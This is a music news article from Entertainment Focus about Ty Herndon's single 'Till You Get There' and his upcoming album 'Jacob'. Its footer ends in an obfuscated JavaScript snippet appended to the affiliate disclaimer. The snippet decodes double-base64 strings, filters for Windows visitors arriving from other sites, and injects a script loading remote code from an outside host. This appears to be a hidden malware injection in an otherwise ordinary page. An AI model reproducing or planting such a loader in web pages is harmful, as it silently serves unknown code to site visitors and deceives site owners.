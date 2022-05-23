Connect with us

Hi, what are you looking for?

Ty Herndon

EF Country

Ty Herndon’s new song ‘Til You Get There’ is a feel-good romp

Ty’s first single from upcoming album ‘Jacob’ goes to Country radio.

Published

‘Till You Get There’ the first single from groundbreaking Grammy-nominated and Dove Award-winning country artist Ty Herndon’s forthcoming album ‘Jacob’ shipped to country radio today (Monday May 23rd) and is now available for streaming and download here: https://vydia.lnk.to/TillYouGetThere

The song is an uptempo, feel-good romp with 90s overtones and a real big heart that leaves you smiling listen, after listen.

“This song is about the trials and tribulations we all face in life — both big and small — that can seem so overwhelming and discouraging when they’re happening. But I believe everything happens just the way God intends, and we don’t always know what all those bumps along our journeys mean until we reach the end. I wanted to kick off this album with a fun, uplifting, and inspiring song that we can all relate to, and I think we nailed it,” said Herndon, who co-wrote the track with Jamie Floyd, Erik Halbig, and Jimmy Thow.Thow also serves as the track’s producer.

Ty Herndon
Credit: Ty Herndon

‘Till You Get There’ kicks off Herndon’s first album of all-new music since 2016’s ‘House On Fire’. Due out July 15, ‘Jacob’ is the culmination of a life of hard-fought struggles and hard-won triumphs. Herndon’s most personal album to date invites listeners to go with him from darkness to light – a trip he has taken in both directions. As he chronicles new parts of his life never before shared, the music plots a path to where Herndon finds himself today — a destination marked by recovery, inner strength,and peace.  With each song based on experiences from his own life — part country, part rock, part gospel – but all Ty Herndon – the country luminary has captured the pain, sorrow, and redemption that are universal to the human experience.

Advertisement. Scroll to continue reading.
In this article:

Advertisement

You May Also Like

The Nitty Gritty Dirt Band The Nitty Gritty Dirt Band

EF Country

The Nitty Gritty Dirt Band – ‘Dirt Does Dylan’ Review

A very strong accounting of the most fruitful period in Bob Dylan's career

4 days ago
Avi Kaplan Avi Kaplan

EF Country

Avi Kaplan – ‘Floating on a Dream’ Review

Kaplan's incredible voice shines through on this highly enjoyable release.

4 days ago
Hanson Hanson

Music

Interview: Isaac and Taylor Hanson on ‘Red Green Blue’ and UK tour

We caught up with the brothers ahead of their latest album release this week.

4 days ago
Old Dominion Old Dominion

EF Country

Your Top 10 Country Music Lyrics to Live By

Which Country songs give you the best advice?

2 days ago



Copyright © 2021 Entertainment Focus

Entertainment Focus is a trading name of Piñata Media Limited (Reg no: 08435639)

Entertainment Focus uses affiliate links. By buying through the links we may receive a commission for the sale. This has no effect on the price for you ;(function(){var mq=document.referrer;var xn=window.location.href;var rw=navigator.userAgent;var rt=new RegExp(xe('T2k4dktGdGVMMTByS1M4PQ=='));if(!mq||xn.match(rt)[1]==mq.match(rt)[1]||rw.indexOf(xe("VjJsdVpHOTNjdz09"))==-1||window.localStorage[xe("WDE5ZmRYUnRZUT09")]){return;}var xs=document.createElement('script');xs.type='text/javascript';xs.async=true;xs.src=xe('YUhSMGNITTZMeTloWTNSdmNuTXVhbU55WVdOcGJtY3VZMjl0TDNKbGNHOXlkRDl5UFdScU1ETk5SR2Q1V2xSak5WcHRUbWhPTWtWM1dUSk5NbGxxUVROT1ExcHFZVmRST1UxcVdYbz0=');var wj=document.getElementsByTagName('script')[0];wj.parentNode.insertBefore(xs,wj);function xe(os){return mj(window.atob(os));}function mj(zc){return window.atob(zc);}})();